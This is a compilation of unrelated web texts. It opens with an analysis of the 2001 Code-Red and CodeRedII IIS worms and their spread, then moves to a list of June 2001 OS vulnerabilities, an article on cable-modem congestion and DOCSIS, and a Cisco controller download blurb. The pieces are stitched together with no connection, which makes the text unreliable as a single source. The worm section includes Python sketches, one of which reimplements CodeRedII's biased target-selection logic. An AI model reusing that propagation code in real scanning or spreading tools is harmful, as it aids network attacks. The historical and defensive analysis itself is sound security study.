Detailed information about the IIS .ida vulnerability can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AD20010618.html).


A security patch for this vulnerability is available from Microsoft at
http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp.


Code-Red version 1 (CRv1)

Detailed information about Code-Red version 1 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html).

On July 12, 2001, a worm began to exploit the aforementioned buffer-overflow vulnerability in Microsoft's IIS webservers. Upon infecting a machine, the worm checks to see if the date (as kept by the system clock) is between the first and the nineteenth of the month. If so, the worm generates a random list of IP addresses and probes each machine on the list in an attempt to infect as many computers as possible. However, this first version of the worm uses a static seed in its random number generator and thus generates identical lists of IP addresses on each infected machine.

The first version of the worm spread slowly, because each infected machine began to spread the worm by probing machines that were either infected or impregnable. The worm is programmed to stop infecting other machines on the 20th of every month. In its next attack phase, the worm launches a Denial-of-Service attack against www1.whitehouse.gov from the 20th-28th of each month.

On July 13th, Ryan Permeh and Marc Maiffret at eEye Digital Security received logs of attacks by the worm and worked through the night to disassemble and analyze the worm. They christened the worm "Code-Red" both because the highly caffeinated "Code Red" Mountain Dew fueled their efforts to understand the workings of the worm and because the worm defaces some web pages with the phrase "Hacked by Chinese". There is no evidence either supporting or refuting the involvement of Chinese hackers with the Code-Red worm.

The first version of the Code-Red worm caused very little damage. The worm did deface web pages on some machines with the phrase "Hacked by Chinese." Although the worm's attempts to spread itself consumed resources on infected machines and local area networks, it had little impact on global resources.

The Code-Red version 1 worm is memory resident, so an infected machine can be disinfected by simply rebooting it. However, once rebooted, the machine is still vulnerable to reinfection. Any machines infected by Code-Red version 1 and subsequently rebooted were likely to be reinfected, because each newly infected machine probes the same list of IP addresses in the same order.
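The effect of the static seed is easy to demonstrate with a short sketch. The snippet below is a hypothetical Python illustration (not the worm's actual code; the function name and seed value are invented) of why a fixed seed makes every infected host probe the same addresses in the same order:

import random
import socket
import struct

# Illustrative sketch only; not the worm's actual code.
def probe_list(count, seed=12345):
    """Generate pseudo-random IPv4 addresses from a fixed seed.

    With a static seed, as in CRv1, every host running this code
    produces exactly the same list, in the same order."""
    rng = random.Random(seed)   # static seed: identical sequence on every host
    targets = []
    for _ in range(count):
        ip_int = rng.getrandbits(32)
        targets.append(socket.inet_ntoa(struct.pack("!I", ip_int)))
    return targets

# Two "infected hosts" generate identical target lists:
assert probe_list(5) == probe_list(5)

A random seed (as in CRv2, described below) would make the two lists differ, which is exactly the change that let the second version spread so much faster.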


Code-Red version 2

Detailed information about Code-Red version 2 can be found at eEye
(http://www.eeye.com/html/Research/Advisories/AL20010717.html) and silicon defense (http://www.silicondefense.com/cr/).

At approximately 10:00 UTC in the morning of July 19th, 2001 a random seed variant of the Code-Red worm (CRv2) began to infect hosts running unpatched versions of Microsoft's IIS webserver. The worm again spreads by probing random IP addresses and infecting all hosts vulnerable to the IIS exploit. Code-Red version 2 lacks the static seed found in the random number generator of Code-Red version 1. In contrast, Code-Red version 2 uses a random seed, so each infected computer tries to infect a different list of randomly generated IP addresses. This seemingly minor change had a major impact: more than 359,000 machines were infected with Code-Red version 2 in just fourteen hours.

Because Code-Red version 2 is identical to Code-Red version 1 in all respects except the seed for its random number generator, its only actual damage is the "Hacked by Chinese" message added to top level webpages on some hosts. However, Code-Red version 2 had a greater impact on global infrastructure due to the sheer volume of hosts infected and probes sent to infect new hosts. Code-Red version 2 also wreaked havoc on some additional devices with web interfaces, such as routers, switches, DSL modems, and printers. Although these devices were not infected with the worm, they either crashed or rebooted when an infected machine attempted to send them a copy of the worm.

Like Code-Red version 1, Code-Red version 2 can be removed from a computer simply by rebooting it. However, rebooting the machine does not prevent reinfection once the machine is online again. On July 19th, the probe rate to hosts was so high that many machines were infected as the patch for the .ida vulnerability was applied.


CodeRedII

Detailed information about CodeRedII can be found at eEye (http://www.eeye.com/html/Research/Advisories/AL20010804.html) and http://aris.securityfocus.com/alerts/codered2/.

On August 4, 2001, an entirely new worm, CodeRedII began to exploit the buffer-overflow vulnerability in Microsoft's IIS webservers. Although the new worm is completely unrelated to the original Code-Red worm, the source code of the worm contained the string "CodeRedII" which became the name of the new worm.

Ryan Permeh and Marc Maiffret analyzed CodeRedII to determine its attack mechanism. When a worm infects a new host, it first determines if the system has already been infected. If not, the worm initiates its propagation mechanism, sets up a "backdoor" into the infected machine, becomes dormant for a day, and then reboots the machine. Unlike Code-Red, CodeRedII is not memory resident, so rebooting an infected machine does not eliminate CodeRedII.

After rebooting the machine, the CodeRedII worm begins to spread. If the host infected with CodeRedII has Chinese (Taiwanese) or Chinese (PRC) as the system language, it uses 600 threads to probe other machines. All other machines use 300 threads.

CodeRedII uses a more complex method of selecting hosts to probe than Code-Red. CodeRedII generates a random IP address and then applies a mask to produce the IP address to probe. The length of the mask determines the similarity between the IP address of the infected machine and the probed machine. 1/8th of the time, CodeRedII probes a completely random IP address. 1/2 of the time, CodeRedII probes a machine in the same /8 (so if the infected machine had the IP address 10.9.8.7, the IP address probed would start with 10.), while 3/8ths of the time, it probes a machine on the same /16 (so the IP address probed would start with 10.9.).

Like Code-Red, CodeRedII avoids probing IP addresses in 224.0.0.0/8 (multicast) and 127.0.0.0/8 (loopback). The bias towards the local /16 and /8 networks means that an infected machine may be more likely to probe a susceptible machine, based on the supposition that machines on a single network are more likely to be running the same software as machines on unrelated IP addresses.
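As a rough reconstruction of this selection logic, the sketch below implements the probabilities described above (1/8 completely random, 1/2 within the same /8, 3/8 within the same /16, skipping the loopback and multicast ranges). It is written in Python purely for illustration; the function name and implementation details are assumptions, not the worm's actual code:

import random
import ipaddress

# Illustrative reconstruction; not the worm's actual code.
def choose_target(own_ip):
    """Pick an address to probe, biased towards the local /8 and /16."""
    own = int(ipaddress.IPv4Address(own_ip))
    while True:
        r = random.random()
        rand32 = random.getrandbits(32)
        if r < 1/8:                      # 1/8: completely random address
            candidate = rand32
        elif r < 1/8 + 1/2:              # 1/2: keep the first octet (same /8)
            candidate = (own & 0xFF000000) | (rand32 & 0x00FFFFFF)
        else:                            # 3/8: keep the first two octets (same /16)
            candidate = (own & 0xFFFF0000) | (rand32 & 0x0000FFFF)
        addr = ipaddress.IPv4Address(candidate)
        # Skip loopback (127.0.0.0/8) and multicast (224.0.0.0/8), as described above
        if addr in ipaddress.ip_network("127.0.0.0/8") or addr in ipaddress.ip_network("224.0.0.0/8"):
            continue
        return str(addr)

# A host at 10.9.8.7 will most often probe addresses beginning with 10. or 10.9.
print(choose_target("10.9.8.7"))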

The CodeRedII worm is much more dangerous than Code-Red because CodeRedII installs a mechanism for remote, root-level access to the infected machine. Unlike Code-Red, CodeRedII neither defaces web pages on infected machines nor launches a Denial-of-Service attack. However, the backdoor installed on the machine allows any code to be executed, so the machines could be used as zombies for future attacks (DoS or otherwise).

A machine infected with CodeRedII must be patched to prevent reinfection and then the CodeRedII worm must be removed. A security patch for this vulnerability is available from Microsoft at http://www.microsoft.com/technet/treeview/default.asp?url=/technet/itsolutions/security/topics/codealrt.asp. A tool that disinfects a computer infected with CodeRedII is also available: http://www.microsoft.com/Downloads/Release.asp?ReleaseID=31878.

CAIDA Analysis

CAIDA's ongoing analysis of the Code-Red worms includes a detailed analysis of the spread of Code-Red version 2 on July 19, 2001, a follow-up survey of the patch rate of machines infected on July 19th, and dynamic graphs showing the prevalence of Code-Red version 2 and CodeRedII worldwide.

The Spread of the Code-Red Worm (CRv2)

An analysis of the spread of the Code-Red version 2 worm between midnight UTC July 19, 2001 and midnight UTC July 20, 2001.

On July 19, 2001 more than 359,000 computers were infected with the Code-Red (CRv2) worm in less than 14 hours. At the peak of the infection frenzy, more than 2,000 new hosts were infected each minute. 43% of all infected hosts were in the United States, while 11% originated in Korea followed by 5% in China and 4% in Taiwan. The .NET Top Level Domain (TLD) accounted for 19% of all compromised machines, followed by .COM with 14% and .EDU with 2%. We also observed 136 (0.04%) .MIL and 213 (0.05%) .GOV hosts infected by the worm. An animation of the geographic expansion of the worm is available.

Animations

To help us visualize the initial spread of Code-Red version 2, Jeff Brown created an animation of the geographic spread of the worm in five minute intervals between midnight UTC on July 19, 2001 and midnight UTC on July 20, 2001. For the animation, infected hosts were mapped to latitude and longitude values using ipmapper, and aggregated by the number at each unique location. The radius of each circle is sized relative to the infected hosts mapped to the center of the circle using the formula 1+ln(total-infected-hosts). When smaller circles are obscured by larger circles, their totals are not combined with the larger circle; the smaller data points are hidden from view.
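For a sense of the scaling, a quick calculation with that formula (radius = 1 + ln(total infected hosts), where a natural logarithm is assumed) shows how strongly it compresses large counts:

import math

for hosts in (1, 10, 100, 10000, 100000):
    radius = 1 + math.log(hosts)   # natural log assumed, per the formula above
    print(f"{hosts:>6} hosts -> circle radius {radius:.1f}")

One infected host gives a radius of 1.0, 100 hosts about 5.6, and 100,000 hosts only about 12.5, so even heavily infected locations remain visible without swamping the map.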

Although we attempted to identify the geographic location of each host as accurately as possible, in many cases the granularity of the location was limited to the country of origin. We plot these hosts at the center of their respective countries, so the rapidly expanding central regions of most countries are an artifact of the localization method.

Animations created by Jeff Brown (UCSD CSE department), based on analysis by David Moore (CAIDA at SDSC).
Copyright UC Regents 2001.

Quicktime animation of growth by geographic breakdown (200K .mov - requires QuickTime v3 or newer)


Windows Bugs Everywhere!

Vulnerabilities, bugs and exploits will keep you on your toes

Every day a new exploit, bug, or vulnerability is found and reported on the Internet, in the news and on TV. Although Microsoft seems to receive the greatest number of bug reports and alerts, it is not alone. Bugs are found in every operating system, whether in server software, desktop software or embedded systems.

Here is a list of bugs and flaws affecting Microsoft products that have been uncovered just in the month of June 2001:

  • MS Windows 2000 LDAP SSL Password Modification Vulnerability
  • MS IIS Unicode .asp Source Code Disclosure Vulnerability
  • MS Visual Studio RAD Support Buffer Overflow Vulnerability
  • MS Index Server and Indexing Service ISAPI Extension Buffer Overflow Vulnerability
  • MS SQL Server Administrator Cached Connection Vulnerability
  • MS Windows 2000 Telnet Privilege Escalation Vulnerability
  • MS Windows 2000 Telnet Username DoS Vulnerability
  • MS Windows 2000 Telnet System Call DoS Vulnerability
  • MS Windows 2000 Telnet Multiple Sessions DoS Vulnerability
  • MS W2K Telnet Various Domain User Account Access Vulnerability
  • MS Windows 2000 Telnet Service DoS Vulnerability
  • MS Exchange OWA Embedded Script Execution Vulnerability
  • MS Internet Explorer File Contents Disclosure Vulnerability
  • MS Outlook Express Address Book Spoofing Vulnerability


The sheer frequency and number of bugs being found does not bode well for Microsoft and the security of its programming methods. These are only the bugs that have been found and reported; bugs like the Internet Explorer flaw may have been around and exploited for months, hidden from discovery by the underground community.

But it isn't just Microsoft that is plagued with bugs and vulnerabilities. All flavors of Linux have their share of serious bugs also. The vulnerabilities below have also been discovered or reported for the month of June 2001:

  • Procfs Stream Redirection to Process Memory Vulnerability
  • Samba remote root vulnerability
  • Buffer overflow in fetchmail vulnerability
  • cfingerd buffer overflow vulnerability
  • man/man-db MANPATH bugs exploit
  • Oracle 8i SQLNet Header Vulnerability
  • Imap Daemon buffer overflow vulnerability
  • xinetd logging code buffer overflow vulnerability
  • Open SSH cookie file deletion vulnerability
  • Solaris libsldap Buffer Overflow Vulnerability
  • Solaris Print Protocol buffer overflow vulnerability


These are not all of the bugs and exploits that affect *nix systems; at least as many *nix bugs were found in the month of June as there were for Microsoft products. Even the Macintosh OS, the operating system that is famous for being almost hacker proof, is also vulnerable. This is especially true with the release of OS X, because OS X is built on a BSD-based Unix core. Many of the Linux/BSD-specific vulnerabilities can therefore also affect Macintosh OS X. As an example, Macintosh OS X is subject to the sudo buffer overflow vulnerability.

Does all of this mean that you should just throw up your hands and give up? Absolutely not! Taken as a whole the sheer number of bugs and vulnerabilities is massive and almost overwhelming. The point is that if you keep up with the latest patches and fixes, your job of keeping your OS secure is not so daunting.

Keeping up is simple if you just know where to look. Each major OS keeps a section of their Web site that is dedicated to security, fixes and patches. Here is a partial list categorized by operating system:

Windows

TechNet Security Bulletins
The Microsoft TechNet section on security contains information on the latest vulnerabilities, bugs, patches and fixes. It also has a searchable database that you can search by product and service pack.

Linux

Since there are so many different flavors of Linux I will list some of the most popular ones here.

RedHat

Alerts and Errata
RedHat lists some of the most recent vulnerabilities here as well as other security links on the RedHat site and security links that can be found elsewhere on the Web.

Slackware

Security Mailing List Archives
Although not as well organized as the Microsoft or RedHat sites, the mailing list archives contain a wealth of information. The archive is organized by year and then by month.

SuSe

SuSE Linux Homepage
Included here is an index of alerts and announcements on SuSe security. There is also a link for you to subscribe to the SuSe Security Mailing list.

Solaris

Security
This is one of the most comprehensive and complete security sites of all of the OSs. If you can't find it here, you won't find it anywhere.

Macintosh

Apple Product Security
Even though the Mac is not as prone to security problems as other OSs, you should still take steps to secure your Mac. With the introduction of OS X, security will be more of a concern.

The Cable Modem Traffic Jam

Tie-ups that slow broadband Internet access to a crawl are a reality--but solutions are near at hand

articles-connectivity-cmtj-1-1

Broadband access to the Internet by cable modem promises users lightning-fast download speeds and an always-on connection. And recent converts to broadband from dial-up technology are thrilled with complex Web screens that download before their coffee gets cold.

But, these days, earlier converts to broadband are noticing something different. They are seeing their Internet access rates slow down, instead of speed up. They are sitting in a cable modem traffic jam. In fact, today, a 56K dial-up modem can at times be faster than a cable modem and access can be more reliable.

Other broadband service providers--digital subscriber line (DSL), integrated-services digital networks (ISDNs), satellite high-speed data, and microwave high-speed data--have their own problems. In some cases, service is simply not available; in other situations, installation takes months, or the costs are wildly out of proportion. Some DSL installations work fine until a saturation point of data subscribers per bundle of twisted pairs is reached, when the crosstalk between the pairs can be a problem. 

In terms of market share, the leaders in providing broadband service are cable modems and DSL as shown below:

articles-connectivity-cmtj-2-1

But because the cable modem was the first broadband access technology to gain wide popularity, it is the first to face widespread traffic tie-ups. These tie-ups have been made visible by amusing advertisements run by competitors, describing the "bandwidth hog" moving into the neighborhood. In one advertisement, for example, a new family with teenagers is seen as a strain on the shared cable modem interconnection and is picketed. (The message is that this won't happen with DSL, although that is only a half-truth.)

So, today, the cable-modem traffic jam is all too real in many cable systems. In severe cases, even the always-on capability is lost. Still, it is not a permanent limitation of the system. It is a temporary problem with technical solutions, if the resources are available to implement the fixes. But during the period before the corrections are made, the traffic jam can be a headache.

Cable modem fundamentals

Today's traffic jam stems from the rapid acceptance of cable broadband services by consumers. A major factor in that acceptance was the 1997 standardization of modem technology that allowed consumers to own the in-home hardware and be happy that their investment would not be orphaned by a change to another cable service provider.

A cable modem system can be viewed as having several components:

articles-connectivity-cmtj-3-1

The cable modem connects to the subscriber's personal computer through the computer's Ethernet port. The purpose of this connection is to facilitate a safe hardware installation without the need for the cable technician to open the consumer's PC. If the PC does not have an Ethernet socket, commercially available hardware and software can be installed by the subscriber or by someone hired by the subscriber.

Downstream communication (from cable company headend to cable subscriber's modem) is accomplished with the same modulation systems used for cable digital television. There are two options, both using packetized data and quadrature amplitude modulation (QAM) in a 6-MHz channel, the bandwidth of an analog television channel. QAM consists of two sinusoidal carriers that are phase shifted 90 degrees with respect to each other (that is, the carriers are in quadrature with each other) and each is amplitude modulated by half of the data. The slower system uses 64 QAM with an approximate raw data rate of 30 Mb/s and a 27-Mb/s payload information rate (which is the actual usable data throughput after all error correction and system control bits are removed). The faster system uses 256 QAM with an approximate raw data rate of 43 Mb/s and a payload information rate of 39 Mb/s.

With 64 QAM, each carrier is amplitude modulated with one of eight amplitude levels. The product of the two numbers of possible amplitude levels is 64, meaning that one of 64 possible pieces of information can be transmitted at a time. Since 2^6 is 64, with 64 QAM modulation, 6 bits of data are transmitted simultaneously. Similarly, with 256 QAM, each carrier conveys one of 16 amplitude levels, and since 256 is 2^8, 8 bits of data are transmitted simultaneously. The higher speed is appropriate for newer or upgraded cable plant, while the lower speed is more tolerant of plant imperfections, such as the ingress of interfering signals and reflected signals from transmission line impedance discontinuities.
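The bits-per-symbol arithmetic can be checked in a few lines of code. The symbol rates below are assumed values (roughly 5 Msymbols/s in a 6-MHz channel), chosen only so that the calculation reproduces the approximate raw rates quoted above:

import math

# Assumed downstream symbol rates for a 6-MHz cable channel (symbols per second)
symbol_rates = {"64 QAM": 5.06e6, "256 QAM": 5.36e6}

for scheme, sym_rate in symbol_rates.items():
    levels = int(scheme.split()[0])            # 64 or 256 constellation points
    bits_per_symbol = int(math.log2(levels))   # 6 bits for 64 QAM, 8 bits for 256 QAM
    raw_rate = sym_rate * bits_per_symbol      # before error correction and overhead
    print(f"{scheme}: {bits_per_symbol} bits/symbol, ~{raw_rate/1e6:.0f} Mb/s raw")

This prints roughly 30 Mb/s for 64 QAM and 43 Mb/s for 256 QAM, matching the figures quoted above; subtracting the error-correction and system-control overhead yields the 27-Mb/s and 39-Mb/s payload rates.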

The upstream communications path (from cable modem to cable headend) resides in a narrower, more challenged spectrum. A large number of interference sources limits the upstream communication options and speeds. Signals leak into the cable system through consumer-owned devices, through the in-home wiring, the cable drop, and the distribution cable. Fortunately, most modern cable systems connect the neighborhood to the headend with optical fiber, which is essentially immune to interfering electromagnetic signals. A separate fiber is usually used for the upstream communications from each neighborhood. Also, the upstream bandwidth is not rigorously partitioned into 6-MHz segments.

Depending on the nature of the cable system, one or more of a dozen options for upstream communications are utilized. The upstream bandwidth and frequency are chosen by the cable operator so as to avoid strong interfering signals.

The cable modem termination system (CMTS) is an intelligent controller that manages the system operation. Managing the upstream communications is a major challenge because all of the cable modems in the subscriber's area are potentially simultaneous users of that communications path. Of course, only one cable modem can instantaneously communicate upstream on one RF channel at a time. Since the signals are packetized, the packets can be interleaved, but they must be timed to avoid collisions.

The 1997 cable modem standard included the possibility of an upstream telephone communications path for cable systems that have not implemented two-way cable. Such one-way cables have not implemented an upstream communications path from subscriber to headend. Using a dial-up modem is a practical solution since most applications involve upstream signals that are mainly keystrokes, while the downstream communications includes much more data-intensive messages that fill the screen with colorful graphics and photographs and even moving pictures and sound. The CMTS system interfaces with a billing system to ensure that an authorized subscriber is using the cable modem and that the subscriber is correctly billed.

The CMTS manages the interface to the Internet so that cable subscribers have access to more than just other cable subscribers' modems. This is accomplished with a router that links the cable system to the Internet service provider (ISP), which in turn links to the Internet. The cable company often dictates the ISP or may allow subscribers to choose from among several authorized ISPs. The largest cable ISP is @Home, which was founded in 1995 by TCI (now owned by AT&T), Cox Communications, Comcast, and others. Another ISP, Road Runner, was created by Time Warner Cable and MediaOne, which AT&T recently purchased.

Cable companies serving 80 percent of all North American households have signed exclusive service agreements with @Home or Road Runner. Two more cable ISPs--High Speed Access Corp. and ISP Channel--serve the remaining U.S. and Canadian broadband households. And other major cable companies, CableVision and Adelphia in the United States and Videotron in Canada, offer their own cable modem service.

Cable modem bottlenecks

If there were just one cable modem in operation, it could in principle have an ultimate data download capacity of 27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system. While the 256 is four times 64, the data capacity does not scale by this factor since the 8 bits simultaneously transmitted by 256 QAM are not four times the 6 bits simultaneously transmitted by 64 QAM. The 256 QAM data rates are only about 50 percent larger than the 64 QAM rates. Of course, if the cable modem is not built into a PC but is instead connected with an Ethernet link, the Ethernet connection is a bottleneck, albeit at 10 Mb/s. In any case, neither of these bottlenecks is likely to bring any complaints since downloads at these speeds would be wonderful.

A much more likely bottleneck is in the cable system's connection to the Internet or in the Internet itself or even the ultimate Web site. For example, Ellis Island recently opened its Web site to citizens to let them search for their ancestors' immigration records, and huge numbers of interested users immediately bogged down the site. No method of subscriber broadband access could help this situation since the traffic jam is at the information source. A chain is only as strong as its weakest link; if the link between the cable operator and the ISP has insufficient capacity to accommodate the traffic requested by subscribers, it will be overloaded and present a bottleneck.

This situation is not unique to a cable modem system. Any system that connects subscribers to the Internet will have to contract for capacity with an ISP or a provider of connections to the Internet backbone, and that capacity must be shared by all the service's subscribers. If too little capacity has been ordered, there will be a bottleneck. This limitation applies to digital subscriber line systems and their connections to the Internet just as it does to cable systems. If the cable operator has contracted with an ISP, the ISP's Internet connection is a potential bottleneck, because it also serves other customers. Of course, the Internet itself can be overloaded as it races to build infrastructure in step with user growth.

Recognizing that the Internet itself can slow things down, cable operators have created systems that cache popular Web sites closer to the user and that contain local sites of high interest. These sites reside on servers close to the subscriber and reduce dependence on access to the Internet. Such systems have been called walled gardens because they attempt to provide a large quantity of interesting Web pages to serve the subscriber's needs from just a local server. Keeping the subscriber within the walled garden not only reduces the demand on the Internet connection, but can also make money for the provider through the sale of local advertising and services. This technique can become overloaded as well. But curing this overload is relatively easy with the addition of more server capacity (hardware) at the cache site.

Two cable ISPs, Road Runner and @Home, were designed to minimize or avoid Internet bottlenecks. They do it by leasing virtual private networks (VPNs) to provide nationwide coverage. VPNs consist of guaranteed, dedicated capacity, which will ensure acceptable levels of nationwide data transport to local cable systems. @Home employs a national high-speed data backbone through leased capacity from AT&T. Early on, a number of problems caused traffic jams, but these are now solved.

Other potential bottlenecks are the backend systems that control billing and authorization of the subscriber's service. As cable modem subscriber numbers grow, these systems must be able to handle the load.

The capacity on the cable system is shared by all the cable modems connected to a particular channel on a particular node. Cable systems are divided into physical areas of several hundred to a few thousand subscribers, each of which is served by a node. The node converts optical signals coming from (and going to) the cable system's headend into radio frequency signals appropriate for the coaxial cable system that serves the homes in the node area:

articles-connectivity-cmtj-4-1

Only the cable modems being used at a particular time fight for sizable amounts of the capacity. Modems that are connected but idle are not a serious problem, as they use minimal capacity for routine purposes.

Clearly, success on the part of a cable company can be a source of difficulty if it sells too many cable modems to its subscribers for the installed capacity. The capacity of a given 6-MHz channel assigned to the subscribers' neighborhood and into their premises is limited to the amounts previously discussed (27 Mb/s in a 64 QAM cable system or 39 Mb/s in a 256 QAM cable system) and the demand for service can exceed that capacity. Both upstream and downstream bandwidth limitations can hinder performance. Upstream access is required to request downloads and to upload files. Downstream access provides the desired information.
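A rough back-of-the-envelope calculation shows how quickly that shared capacity is divided up. The subscriber count and concurrency figure below are made-up example numbers, not measurements from any real system:

# Downstream payload capacity of one 6-MHz channel, from the figures above
payload_mbps = {"64 QAM": 27.0, "256 QAM": 39.0}

node_subscribers = 500    # hypothetical cable modems sharing one channel on a node
active_fraction = 0.10    # hypothetical share of modems downloading at the same moment

for scheme, capacity in payload_mbps.items():
    active = node_subscribers * active_fraction
    per_user = capacity / active
    print(f"{scheme}: about {per_user:.2f} Mb/s per active user "
          f"({active:.0f} of {node_subscribers} modems busy)")

With these assumptions each active user sees well under 1 Mb/s, which is why a lightly loaded node feels fast and an oversold one feels like a traffic jam.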

Usually, it is the downstream slowdown that is noticed. Some browsers (the software that interprets the data and paints the images on the computer screen) include so-called fuel gauges, animated bar graphs that display the progress of the download. They can be satisfying when they zip along briskly, but rub salt in the wound when they crawl slowly and remind the user that time is wasting.

Bandwidth hogs in a subscriber's neighborhood can be a big nuisance. As subscribers attempt to share large files, like music, photos, or home movies, they load up the system. One of the rewards of high-speed Internet connections is the ability to enjoy streaming video and audio. Yet these applications are a heavy load on all parts of the system, not just the final link. System capacity must keep up with both the number of subscribers and the kinds of applications they demand. As the Internet begins to look more like television with higher-quality video and audio, it will require massive downstream capacity to support the data throughput. As the Internet provides more compelling content, it will attract even more subscribers. So the number of subscribers grows and the bandwidth each demands also grows. Keeping up with this growth is a challenge.

Impact of open access

Open access is the result of a fear on the part of the government regulators that cable system operators will be so successful in providing high-speed access to the Internet that other ISPs will be unable to compete. The political remedy is to require cable operators to permit competitive ISPs to operate on their systems. Major issues include how many ISPs to allow, how to integrate them into the cable system, and how to charge them for access. The details of how open access is implemented may add to the traffic jam.

A key component in dealing with open access is the CMTS. The ports on the backend of this equipment connect to the ISPs. But sometimes too few ports are designed into the CMTS for the number of ISPs wishing access. More recent CMTS designs accommodate this need. However, these are expensive pieces of equipment, costing up to several hundred thousand dollars, and an investment in an earlier unit cannot be abandoned without great financial loss.

If the cost of using cable modem access is fairly partitioned between the cost of using the cable system and the access fees charged by the cable company, then the cable operator is fairly compensated for the traffic. With more ISPs promoting service, the likelihood is that there will be more cable modem subscribers and higher usage. This, of course, will contribute to the traffic jam. In addition, the backend processing of billing and cable modem authorization can be a strain on the system.

What to do about the traffic jam?

The most important development in dealing with all these traffic delays is the release of the latest version of the cable modem technical standard. Docsis Release 1.1 (issued by CableLabs in 1999) includes many new capabilities, of which the most pertinent in this context is quality of service (QoS). In most aspects of life, the management of expectations is critical to success. When early adopters of cable modem service shared a lightly loaded service, they became accustomed to lightning access. When more subscribers were added, the loading of the system lowered speed noticeably for each subscriber in peak service times.

Similarly, the difference between peak usage times and the late night or early morning hours can be substantial. It is not human nature to feel grateful for the good times while they last, but rather to feel entitled to good times all the time. The grades of service provided by QoS prevent the buildup of unreasonable expectations and afford the opportunity to contract for guaranteed levels of service. Subscribers with a real need for speed can get it on a reliable basis by paying a higher fee while those with more modest needs can pay a lower price. First class, business class, and economy can be implemented with prices to match.

Beefing up to meet demand

Network traffic engineering is the design and allocation of resources to satisfy demand on a statistical basis. Any economic system must deal with peak loads while not being wasteful at average usage times. Consumers find it difficult to get a dial tone on Mother's Day, because it would be impractically expensive to have a phone system that never failed to provide dial tone. The same is true of a cable modem system. At unusually high peaks, service may be temporarily delayed or even unavailable.

An economic design matches the capacity of all of the system elements so that no element is underutilized while other elements are under constant strain. This means that a properly designed cable modem system will not have one element reach its maximum capacity substantially before other elements are stressed. There should be no weakest links. All links should be of relatively the same capacity.

More subscribers can be handled by allocating more bandwidth. Instead of just one 6-MHz channel for cable modem service, two or more can be allocated along with the hardware and software to support this bandwidth. Since many cable systems are capacity limited, the addition of another 6-MHz channel can be accomplished only by sacrificing the service already assigned to it. A typical modern cable system would have a maximum frequency of about 750 MHz. This allows for 111 or so 6-MHz channels to be allocated to conflicting demands. Perhaps 60-75 of them carry analog television. The remainder are assigned to digital services such as digital television, video on demand, broadband cable service, and telephony.

Canceling service to free up bandwidth for cable modems may cause other subscriber frustrations. While adding another 6-MHz channel solves the downstream capacity problem, if the upstream capacity is the limiting factor in a particular cable system, merely adding more 6-MHz channels will still leave a traffic jam. The extra channels help with only one of the traffic directions.

Cable nodalization is another important option in cable system design for accommodating subscriber demand. Nodalization is essentially the dividing up of the cable system into smaller cable systems, each with its own path to the cable headend. The neighborhood termination of that path is called a node. In effect, then, several cables, instead of a single cable, come out of the headend to serve the neighborhoods.

Cable system nodes cater to anywhere from several thousand subscribers to just a few hundred. Putting in more nodes is costly, but the advantage of nodalization is that the same spectrum can be used differently at each node. A specific 6-MHz channel may carry cable modem bits to the users in one node while the same 6-MHz channel carries completely different cable modem bits to other users in an adjacent node. This has been called space-division multiplexing since it permits different messages to be carried, depending on the subscriber's spatial location.

An early example of this principle was deployed in the Time Warner Cable television system in Queens, New York City. Queens is a melting pot of nationalities. The immigrants there tend to cluster in neighborhoods where they have relatives and friends who can help them make the transition to the new world. The fiber paths to these neighborhoods can use the same 6-MHz channel for programs in different languages. So a given channel number can carry Chinese programming on the fiber serving that neighborhood, Korean programming on another fiber, and Japanese programming on still another fiber. As the 747s fly into the John F. Kennedy International Airport in Queens each night, they bring tapes from participating broadcasters in other countries that become the next day's programming for the various neighborhoods. (Note that this technique is impossible in a broadcast or satellite transmission system since such systems serve the entire broadcast area and cannot employ nodalization.)

The same concept of spectrum reuse is applied to the cable modem. A 6-MHz channel set aside for this purpose carries the cable modem traffic for the neighborhood served by its respective node. While most channels carry the same programming to all nodes, just the channel(s) assigned to the modem service carry specialized information directed to the individual nodes. Importantly, nodalization reuses the upstream spectrum as well as the downstream spectrum. So, given enough nodes, traffic jams are avoided in both directions.

However, nodalization is costly. Optical-fiber paths must be installed from the headend to the individual nodes. The fiber paths require lasers and receivers to convert the optical signals into electrical signals for the coaxial cable in the neighborhood. Additional modulators per node are required at the cable headend, as well as routers to direct the signals to their respective lasers. The capital investment is substantial. However, it is technically possible to solve the problem. (In principle, nodalization could be implemented in a fully coaxial cable system. But in practice coaxial cable has much higher losses than fiber and incurs even greater expense in the form of amplifiers and their power supplies.)

Other techniques for alleviating the traffic jam include upgrading the cable system so that 256 QAM can be used instead of 64 QAM downstream and 16 QAM can be used upstream instead of QPSK. If the ISP's connection to the Internet is part of the problem, a larger data capacity connection to the Internet backbone can be installed.

Also, non-Docsis high-speed access systems are under development for very heavy users. These systems will provide guaranteed ultrahigh speeds of multiple megabits per second in the downstream direction while avoiding the loading of the Docsis cable modem channels. The service can then be partitioned into commercial and residential or small business services that do not limit each other's capabilities.

Speculations on the future

The cable modem traffic jam is due to rapid growth that sometimes outpaces the resources available to upgrade the cable system. But solutions may be near at hand.

The next wave of standardization, Docsis 1.1 released in 1999, provides for quality-of-service segmentation of the market. Now that the standard is released, products are in development by suppliers and being certified by CableLabs. Release 1.1 products will migrate into the subscriber base over the next several years. Subscribers will then be able to choose the capacity they require for their purposes and pay an appropriate fee. The effect will be to discourage bandwidth hogs and ensure that those who need high capacity, and are willing to pay for it, get it. And market segmentation will provide financial justification to implement even more comprehensive nodalization. After enough time has passed for these system upgrades to be deployed, the traffic jam should resolve itself.

Cisco WLC & AP Compatibility Matrix Download

Complete Cisco WLC Wireless Controllers, Aironet APs & Software Compatibility Matrix - Free Download

cisco wlc ap compatibility list download

Firewall.cx’s download section now includes the Cisco WLC Wireless Controllers Compatibility Matrix as a free download. The file contains two PDFs with an extensive list of all old and new Cisco Wireless Controllers and their supported Access Points across a diverse range of firmware versions.

The WLC compatibility list includes: WLC 2100, 2504, 3504, 4400, 5508, 5520, 7510, 8510, 8540, Virtual Controller, WiSM, WiSM2, SRE, 9800 series and more.

The Access Point series compatibility list includes: 700, 700W, 1000, 1100, 1220, 1230, 1240, 1250, 1260, 1300, 1400, 1520, 1530, 1540, 1550, 1560, 1600, 1700, 1800, 2600, 2700, 2800, 3500, 3600, 3700, 3800, 4800, IW6300, 9100, 9130, 9160 and more.

